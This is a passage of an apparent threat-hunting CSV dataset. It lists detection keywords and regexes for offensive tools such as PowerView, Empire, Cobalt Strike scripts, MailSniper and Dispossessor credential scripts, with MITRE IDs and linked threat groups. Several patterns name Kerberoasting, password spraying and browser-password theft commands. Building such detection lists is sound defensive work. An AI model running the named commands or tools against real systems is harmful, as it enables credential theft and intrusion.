- T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SQLInstanceDomain.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45985"
"*Get-DomainSpn*",".{0,1000}Get\-DomainSpn.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","45986"
"*Get-DomainSPNTicket *",".{0,1000}Get\-DomainSPNTicket\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45987"
"*getdomainspnticket*",".{0,1000}getdomainspnticket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45988"
"*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","45989"
"*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45990"
"*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45991"
"*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45992"
"*GetDomainSPNTickets(*",".{0,1000}GetDomainSPNTickets\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","45993"
"*Get-DomainUser -PreauthNotRequired*",".{0,1000}Get\-DomainUser\s\-PreauthNotRequired.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45995"
"*Get-DomainUser -SPN | select samaccountname,serviceprincipalname*",".{0,1000}Get\-DomainUser\s\-SPN\s\|\sselect\ssamaccountname,serviceprincipalname.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45996"
"*Get-DomainUser -TrustedToAuth | select userprincipalname",".{0,1000}Get\-DomainUser\s\-TrustedToAuth\s\|\sselect\suserprincipalname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45997"
"*Get-DomainUserList -Domain * -RemoveDisabled *",".{0,1000}Get\-DomainUserList\s\-Domain\s.{0,1000}\s\-RemoveDisabled\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","45998"
"*Get-DXWebcamVideo.ps1*",".{0,1000}Get\-DXWebcamVideo\.ps1.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","N/A","8","1","87","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z","45999"
"*getent passwd | grep sh$ | cut -d *",".{0,1000}getent\spasswd\s\|\sgrep\ssh\$\s\|\scut\s\-d\s.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","46001"
"*getEnvExitPtr.exe*",".{0,1000}getEnvExitPtr\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46002"
"*Get-ExchangeAccessToken*",".{0,1000}Get\-ExchangeAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46003"
"*Get-ExoPsAccessToken*",".{0,1000}Get\-ExoPsAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46004"
"*getExploit.py*",".{0,1000}getExploit\.py.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z","46005"
"*Get-ExploitableSystem -Verbose*",".{0,1000}Get\-ExploitableSystem\s\-Verbose.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","46006"
"*getexploitablesystem*",".{0,1000}getexploitablesystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","46007"
"*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","46008"
"*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46009"
"*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","46010"
"*Get-ExploitableSystem.*",".{0,1000}Get\-ExploitableSystem\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","46011"
"*Get-ExploitableSystem.psm1*",".{0,1000}Get\-ExploitableSystem\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46012"
"*Get-ExploitableSystems.psm1*",".{0,1000}Get\-ExploitableSystems\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46013"
"*Get-ExploitableUnquotedPath*",".{0,1000}Get\-ExploitableUnquotedPath.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46014"
"*Get-FakeServiceUsers*",".{0,1000}Get\-FakeServiceUsers.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","46015"
"*Get-FileContentsWMImplant*",".{0,1000}Get\-FileContentsWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","46016"
"*Get-FireFoxHistory*",".{0,1000}Get\-FireFoxHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46017"
"*Get-FirefoxPasswords *",".{0,1000}Get\-FirefoxPasswords\s.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46018"
"*Get-FirefoxPasswords.ps1*",".{0,1000}Get\-FirefoxPasswords\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46019"
"*Get-ForgedUserAgent *",".{0,1000}Get\-ForgedUserAgent\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","46020"
"*Get-ForgedUserAgent.ps1*",".{0,1000}Get\-ForgedUserAgent\.ps1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","46021"
"*Get-FoxDump *",".{0,1000}Get\-FoxDump\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - 